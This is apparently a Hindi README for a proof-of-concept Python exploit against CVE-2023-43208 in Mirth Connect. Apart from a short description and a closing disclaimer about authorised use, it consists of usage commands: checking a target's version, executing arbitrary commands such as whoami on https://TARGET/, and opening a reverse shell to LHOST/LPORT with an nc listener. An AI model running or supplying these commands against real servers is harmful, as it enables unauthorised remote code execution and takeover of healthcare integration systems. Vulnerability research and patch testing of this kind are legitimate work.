
प्रूफ-ऑफ-कॉन्सेप्ट पायथन स्क्रिप्ट जो Mirth Connect में CVE‑2023‑43208 को प्रदर्शित करती है, तथा असुरक्षित इंस्टेंस पर संस्करण जाँच और कमांड निष्पादन की अनुमति देती है।
# एक साफ वर्चुअल वातावरण बनाएँ
python3 -m venv .venv
source .venv/bin/activate
# पिन की गई निर्भरताएँ स्थापित करें
pip install -r requirements.txt
# केवल संस्करण जाँचें
python3 CVE-2023-43208.py -u https://TARGET/ --check
# एकल कमांड निष्पादित करें
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"
# रिवर्स शेल (पहले nc लिसनर शुरू करें)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT
यह प्रूफ‑ऑफ‑कॉन्सेप्ट केवल अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसे उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। इस कोड के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।